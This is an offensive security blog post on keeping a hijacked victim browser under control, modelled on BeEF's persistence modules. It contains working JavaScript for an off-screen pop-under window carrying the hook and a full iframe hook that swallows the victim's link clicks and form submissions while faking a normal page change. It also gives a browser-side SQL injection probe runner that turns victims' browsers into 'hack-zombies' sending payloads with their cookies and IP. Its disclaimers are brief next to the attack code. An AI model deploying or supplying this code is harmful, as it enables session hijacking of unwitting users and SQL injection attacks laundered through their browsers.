🌟 Persistent Browser Techniques: Unleashing the Power within the Web 🌟

Hi! Here are some persistent browser techniques. What follows is a detailed look at two methods for keeping a hooked browser under your control after the victim has clicked away. So, tighten your virtual seatbelts, and let's set sail!

Technique 1: The Simple Window Trick

// Open a small window far outside the visible screen. Browsers clamp the
// coordinates to the available screen area, so the window usually ends up
// tucked in a corner or behind the main window rather than fully invisible.
function openSmallWindow(url) {
  var width = 200;
  var height = 200;
  var left = 9999;
  var top = 9999;
  var features = `width=${width},height=${height},left=${left},top=${top}`;

  window.open(url, '_blank', features);
}

// A click is a user gesture, so popup blockers let this window.open through.
// The same call from a timer or the load event is blocked by default.
document.addEventListener('click', function() {
  var url = 'https://www.example.com';
  openSmallWindow(url);
});

What sorcery is this, you ask? It's as easy as pie! We've concocted a small but mighty function called openSmallWindow. On the victim's first click anywhere in the document, it opens a new 200x200 window pointed at the URL of our choice (in practice, the page that carries the hook) and asks the browser to place it at 9999,9999, far away from where the victim is looking. The click matters: window.open only gets past popup blockers when it runs inside a user gesture. Once that window exists, it keeps running its script even after the victim navigates the original tab elsewhere or closes it, which is the whole point of the trick. A simple click, and a window emerges!

Technique 2: The Beastly Iframe Power

Link of POC:

Hold onto your hats, folks! This technique delves into the depths of complexity. The persistentIframe function takes center stage, hooking the clicks and form submissions that happen inside the hooked page. Instead of letting the browser navigate away (which would unload the hooked page and the hook with it), it creates hidden or fullscreen iframes, loads the clicked URL or the form's action inside them, and touches up the surrounding page so the victim believes a normal navigation took place. It's like wielding dark magic within the web!

The code provided consists of several functions that work together to create a powerful mechanism for persistent browser actions. Let’s dive deeper into each component:

  • getHighestZindex(include_id):
    This function iterates through all the elements in the document, querying their computed styles, and identifies the element with the highest z-index value.
    It returns the highest z-index value or, if include_id is set to true, it returns an object containing both the highest z-index value and the corresponding element’s ID.

  • createIframe(type, params, styles, onload):
    This function dynamically creates an iframe element with customizable attributes, styles, and behavior.
    The type parameter determines the type of iframe to create: “hidden”, “fullscreen”, or any other value for a regular iframe.
    The params object allows you to specify additional attributes for the iframe, such as the source URL or form submission details.
    The styles object contains CSS styles to be applied to the iframe.
    If an onload function is provided, it will be called when the iframe’s content has finished loading.

  • persistentIframe():
    This function sets up event listeners for clicks on links (<a> tags), form submissions, and button clicks within the document.
    When any of these events occur, the corresponding handleClick function is called and the browser's default navigation is cancelled.
    Inside handleClick, the target element, its attributes (such as href, action, and method), and the form data are extracted.
    If the target element has an href attribute, a fullscreen iframe is created, loading the URL specified in the href attribute. The page's title, scroll behavior, and overflow are also modified so that the framed content passes for a real page change.
    If the target element has an action attribute (e.g., a form submission), an iframe is created with the specified action URL, method, and form data (if applicable).
    The resulting iframes are appended to the document's body, where they sit on top of the original content thanks to the z-index computed earlier.

By combining these functions and event listeners, the code establishes a persistent iframe-based mechanism. It enables actions such as opening URLs, submitting forms, and capturing user interactions, all within iframes that seamlessly integrate with the existing web page, while the hooked page underneath never unloads.

This technique empowers you to create complex browser interactions, manipulate content, and keep control over hooked browsers for as long as the victim stays on the site. However, be cautious and use such powers responsibly and ethically.
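As an added example (my own code, modelled on the functions described above, not the post's POC), here is a compact persistent-iframe hook. The decision step is kept free of DOM calls so it can be checked on its own; the names planNavigation and showInFrame, and the victim.example host used in the comments, are my assumptions.

```javascript
// Added example, not the post's POC: route every link click and form submission
// of the hooked page into a fullscreen iframe so the hooking page never unloads.

// Largest numeric z-index among a list of computed values ("auto" is ignored).
function highestZindex(values) {
  let max = 0;
  for (const v of values) {
    const n = parseInt(v, 10);
    if (!Number.isNaN(n) && n > max) max = n;
  }
  return max;
}

function getHighestZindex(doc) {
  const view = doc.defaultView;
  return highestZindex(Array.from(doc.querySelectorAll('*'),
    (el) => view.getComputedStyle(el).zIndex));
}

// Pure decision step: from a plain description of the clicked link or submitted
// form, work out what the frame must load. Returns null to leave the event alone.
function planNavigation(target, baseUrl) {
  const tag = String(target.tagName || '').toUpperCase();
  if (tag === 'A' && target.href) {
    const url = new URL(target.href, baseUrl);
    if (url.protocol !== 'http:' && url.protocol !== 'https:') return null; // javascript:, mailto: ...
    return { type: 'fullscreen', method: 'GET', src: url.href, body: null };
  }
  if (tag === 'FORM') {
    const url = new URL(target.action || '', baseUrl);          // no action = current page
    const method = String(target.method || 'GET').toUpperCase();
    const fields = new URLSearchParams(target.fields || []);     // [name, value] pairs
    if (method !== 'POST') {
      url.search = fields.toString();                            // GET forms replace the query string
      return { type: 'fullscreen', method: 'GET', src: url.href, body: null };
    }
    return { type: 'fullscreen', method: 'POST', src: url.href, body: fields.toString() };
  }
  return null;
}

// Build an iframe: "hidden" for silent requests, "fullscreen" to cover the page.
function createIframe(doc, type, params, styles, onload) {
  const frame = doc.createElement('iframe');
  if (params.src) frame.src = params.src;
  if (params.name) frame.name = params.name;
  if (type === 'hidden') frame.style.display = 'none';
  else if (type === 'fullscreen') Object.assign(frame.style, { position: 'fixed', top: '0',
    left: '0', width: '100vw', height: '100vh', border: '0', margin: '0' });
  Object.assign(frame.style, styles || {});
  if (onload) frame.addEventListener('load', onload);
  return frame;
}

// Carry out a plan in the live document.
function showInFrame(doc, plan) {
  const name = 'pf_' + Date.now();
  const frame = createIframe(doc, plan.type,
    { name, src: plan.method === 'GET' ? plan.src : 'about:blank' },
    { zIndex: String(getHighestZindex(doc) + 1) },
    () => { try { doc.title = frame.contentDocument.title; } catch (_) { /* cross-origin: title stays */ } });
  doc.body.appendChild(frame);
  doc.body.style.overflow = 'hidden';            // the page behind the frame must not scroll
  if (plan.method === 'POST') {
    // A hidden form targeting the frame by name replays the POST inside it.
    const form = doc.createElement('form');
    form.method = 'POST'; form.action = plan.src; form.target = name; form.style.display = 'none';
    for (const [k, v] of new URLSearchParams(plan.body)) {
      const input = doc.createElement('input');
      input.type = 'hidden'; input.name = k; input.value = v;
      form.appendChild(input);
    }
    doc.body.appendChild(form);
    form.submit();
    form.remove();
  }
}

// Hook link clicks and form submissions in the capture phase, ahead of the page's
// own handlers. Submit buttons fire the submit event, so they are covered too.
function persistentIframe(doc) {
  const base = doc.defaultView.location.href;
  doc.addEventListener('click', (ev) => {
    const a = ev.target && ev.target.closest ? ev.target.closest('a[href]') : null;
    if (!a) return;
    const plan = planNavigation({ tagName: 'A', href: a.getAttribute('href') }, base);
    if (!plan) return;
    ev.preventDefault();
    showInFrame(doc, plan);
  }, true);
  doc.addEventListener('submit', (ev) => {
    const f = ev.target;
    const plan = planNavigation({ tagName: 'FORM', action: f.getAttribute('action'),
      method: f.getAttribute('method'), fields: Array.from(new FormData(f)) }, base);
    if (!plan) return;
    ev.preventDefault();
    showInFrame(doc, plan);
  }, true);
}

if (typeof document !== 'undefined') persistentIframe(document);   // inert outside a browser
```

Two things worth noticing. The POST branch cannot simply set iframe.src, because a frame only navigates by GET; a throwaway form whose target is the frame's name replays the request with the original fields. And the title sync sits in a try/catch on purpose: once the frame holds a page from another origin, contentDocument is off limits, so the hooked page's title is the only thing the victim keeps seeing.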

The Beast Behind: BeEF

Ah, the legend of BeEF! This technique aligns with the powers of the notorious Browser Exploitation Framework, also known as BeEF. Picture it as a treasure trove for web hackers, filled with modules for all sorts of browser exploitation shenanigans, driven from a hook script that the victim's browser keeps polling.

BeEF's persistence modules employ the same two ideas to keep hold of hooked browsers: a pop-under window that carries the hook, and a man-in-the-browser style iframe that swallows the victim's navigation. Those modules take the technique we just explored and elevate it to a whole new level of complexity. With some improvements and tweaks, they can unlock extraordinary capabilities and provide endless possibilities within the realm of browser exploitation.

Limitations: Taming the Beasts

As with any extraordinary power, there are limitations to consider. Let’s explore the boundaries of these techniques:

🔒 Technique 1 Limitations:

Popup blockers might interfere with the window creation process: window.open is only allowed in direct response to a user gesture such as the click we hook, and never from a timer or page load.
Modern browsers have become more vigilant about blocking popups, so users might have to allow popups for the technique to work, and the off-screen coordinates are clamped to the visible screen, so the window is small and out of the way rather than truly invisible.
It heavily relies on the user's browser settings and behavior: the moment the victim spots and closes the window, the persistence is gone.

🔒 Technique 2 Limitations:

Cross-origin policies get in the way twice: a site that sends X-Frame-Options or a Content-Security-Policy frame-ancestors directive refuses to be framed at all, and even when a cross-origin page does load, the same-origin policy stops the hooked page from reading anything inside the frame. Cross-site frames also load without the victim's SameSite=Lax and Strict cookies, so a framed site may appear logged out.
Modern browsers have enhanced security measures that restrict iframes: a sandbox attribute or a CSP frame-src directive on the hooked page itself can stop the frames from being created or from running script.
The technique may be detected by browser extensions, endpoint security software or a vigilant user (the address bar never changes while the content does), triggering alerts or blocking the execution.

Abusing requests to use clients as your "hack-zombies" (audJSditor)

The next step after persistence would be to use the hooked client for our own purposes: every request it sends comes from the victim's IP address and, for the victim's own sites, carries the victim's cookies.

Look at this proof of concept; let's explain it below:

http://…

The code contains an array called 'DB_TYPEPayloadsArray' which stores various types of payloads for different database types like standard SQL, PostgreSQL, MySQL, NoSQL, SQLite, MongoDB, and Cassandra.

Each database type has three categories of payloads: ErrorBased, TimeBased, and BooleanBased. These are the classic SQL injection probe families. ErrorBased payloads (a stray quote, an unbalanced parenthesis) try to break the query so that the database's error text leaks into the response; TimeBased payloads call a sleep function so that a vulnerable query visibly delays the response; BooleanBased payloads send a true and a false condition and compare the two pages.

The code also includes a function called 'checkPayload' that takes in parameters like the URL of the target application, cookies, database type, and payload type. It picks a random user agent from a list covering popular browsers like Chrome, Firefox, and Safari to make the requests look more varied. Two caveats a practitioner should keep in mind: browsers do not let page script set the Cookie header, so the cookies parameter only has an effect when the hooked browser already holds the target's cookies and the request is sent with credentials; and some browsers still refuse script-supplied User-Agent headers, in which case the hooked browser's real one goes out.

The function sends HTTP requests to the target URL with the specified payload and checks the response for signs of injection: DBMS error text, a page that changes between the true and false conditions, or a delay. It also includes a timeout of 5 seconds to avoid long delays. Note that a TimeBased payload that sleeps for 5 seconds will trip that very timeout, so the abort itself has to be read as the positive signal, or the timeout raised above the injected delay.
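The following is an added example of how such a browser-side probe runner fits together; it is my own code, not the audJSditor source. The target URL, parameter name, the two database families in the payload table, and the function names (injectPayload, evaluate, probe) are assumptions; the probe strings are the usual public test inputs, not target-specific exploits.

```javascript
// Added example, not the audJSditor source: a browser-side SQLi probe runner.
// Target URL, parameter name and the payload table are illustrative assumptions.

const USER_AGENTS = [
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0',
  'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15',
];

// Two of the families the post's DB_TYPEPayloadsArray covers, with the same three
// categories. BooleanBased entries are [true-condition, false-condition] pairs.
const SLEEP_SECONDS = 5;
const DB_PAYLOADS = {
  MySQL: {
    ErrorBased: ["'", '"', "')"],
    TimeBased: [`' AND SLEEP(${SLEEP_SECONDS})-- -`],
    BooleanBased: [["' AND 1=1-- -", "' AND 1=2-- -"]],
  },
  PostgreSQL: {
    ErrorBased: ["'", "')"],
    TimeBased: [`'; SELECT pg_sleep(${SLEEP_SECONDS})--`],
    BooleanBased: [["' AND 1=1--", "' AND 1=2--"]],
  },
};

// Error text that marks a DBMS complaint leaking into the page.
const ERROR_SIGNATURES = [
  /You have an error in your SQL syntax/i,
  /Warning: mysqli?_/i,
  /unterminated quoted string at or near/i,
  /syntax error at or near/i,
  /PG::SyntaxError|pg_query\(\)/i,
];

// The request must be allowed to outlive the injected delay, otherwise a 5 s sleep
// and a 5 s timeout look the same. An abort is still counted as a time-based hit.
const TIMEOUT_MS = 2 * SLEEP_SECONDS * 1000;

function pickUserAgent(rand = Math.random) {
  return USER_AGENTS[Math.floor(rand() * USER_AGENTS.length)];
}

// Append the probe to the current value of one query parameter.
function injectPayload(targetUrl, param, payload) {
  const u = new URL(targetUrl);
  u.searchParams.set(param, (u.searchParams.get(param) || '') + payload);
  return u.href;
}

// Classify one observation. `opaque` means a cross-origin response the browser
// would not expose (mode 'no-cors' or a CORS failure): only timing is usable then.
function evaluate(payloadType, obs) {
  if (payloadType === 'TimeBased') {
    const slow = obs.timedOut || obs.elapsedMs >= SLEEP_SECONDS * 1000;
    return { verdict: slow ? 'likely' : 'none', reason: `elapsed ${obs.elapsedMs} ms` };
  }
  if (obs.opaque) return { verdict: 'unknown', reason: 'cross-origin response body unreadable' };
  if (payloadType === 'ErrorBased') {
    const hit = ERROR_SIGNATURES.find((re) => re.test(obs.body));
    return { verdict: hit ? 'likely' : 'none', reason: hit ? `matched ${hit}` : 'no DBMS error text' };
  }
  throw new Error(`unsupported payload type ${payloadType}`);
}

// Boolean-based needs both halves: true and false conditions should yield different pages.
function evaluateBoolean(trueObs, falseObs) {
  if (trueObs.opaque || falseObs.opaque) return { verdict: 'unknown', reason: 'bodies unreadable' };
  const differs = trueObs.body !== falseObs.body;
  return { verdict: differs ? 'likely' : 'none', reason: differs ? 'responses differ' : 'responses identical' };
}

// One request from the hooked browser; credentials:'include' attaches whatever
// cookies the browser already holds for the target (script cannot set Cookie itself).
async function probe(url, mode) {
  const ctl = new AbortController();
  const timer = setTimeout(() => ctl.abort(), TIMEOUT_MS);
  const started = Date.now();
  try {
    const res = await fetch(url, { mode, credentials: 'include', signal: ctl.signal,
      headers: { 'User-Agent': pickUserAgent() } });   // dropped by browsers that forbid this header
    const opaque = res.type === 'opaque';
    return { status: res.status, body: opaque ? '' : await res.text(), opaque,
      elapsedMs: Date.now() - started, timedOut: false };
  } catch (err) {
    return { status: 0, body: '', opaque: true, elapsedMs: Date.now() - started,
      timedOut: err.name === 'AbortError' };
  } finally {
    clearTimeout(timer);
  }
}

// Run every payload of one category against one parameter. Use mode 'no-cors' for
// targets on another origin; error- and boolean-based checks then come back 'unknown'.
async function checkPayload(targetUrl, param, dbType, payloadType, mode = 'cors') {
  const results = [];
  for (const entry of DB_PAYLOADS[dbType][payloadType]) {
    if (payloadType === 'BooleanBased') {
      const [t, f] = entry;
      const verdict = evaluateBoolean(await probe(injectPayload(targetUrl, param, t), mode),
        await probe(injectPayload(targetUrl, param, f), mode));
      results.push({ payload: `${t} / ${f}`, ...verdict });
    } else {
      const obs = await probe(injectPayload(targetUrl, param, entry), mode);
      results.push({ payload: entry, ...evaluate(payloadType, obs) });
    }
  }
  return results;
}

// From a hooked page (placeholder target):
// checkPayload('https://target.example/item?id=1', 'id', 'MySQL', 'TimeBased', 'no-cors').then(console.table);
```

The split into evaluate and probe is deliberate: the zombie's browser decides what is readable, not us. Against a same-origin target all three families work; against another origin the request still leaves (useful for the IP and cookie angle), but only the clock carries information, which is why the time-based path never looks at the body.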

However, it's important to note that this code is for educational purposes only and should not be used maliciously. It's always best to obtain proper authorization before testing the security of any application. Also, keep in mind that this tool has limitations. It may not work against applications with strong security measures in place, or when the target database is properly configured to prevent SQL injection attacks. And because the requests come from a browser, a target on another origin will receive them but, without a permissive CORS policy, the script cannot read the responses, which leaves only the time-based checks.

So, if you're interested in testing the security of your web applications and want to explore SQL injection vulnerabilities, give AudJSditor a try! But remember to use it responsibly and ethically.

That covers the JavaScript code, its similarities with sqlmap (the same payload families, error signatures and timing checks, run from a hooked browser instead of your own machine), and the limitations you may run into when using this tool.

Conclusions: Sailing through the Web’s Persistence

Avast, fellow web adventurers! We've uncovered the secrets of persistence within the vast ocean of browsers. The simple window trick offers a quick and straightforward way to park the hook in a small window that outlives the original tab, while the beastly iframe power immerses us in a world of complexity and manipulation, keeping the hooked page alive by swallowing every navigation into a frame.

Remember, the power we've unveiled here carries great responsibility. While BeEF's persistence modules may face obsolescence due to evolving security measures (popup blocking, framing protections, SameSite cookies), with continuous improvement and clever adaptations they can still unleash astonishing possibilities.

Now, go forth and navigate the web with newfound knowledge! Tread carefully, respect boundaries, and always use your powers for good. Happy hacking, mates! ⚡️🌐⚔️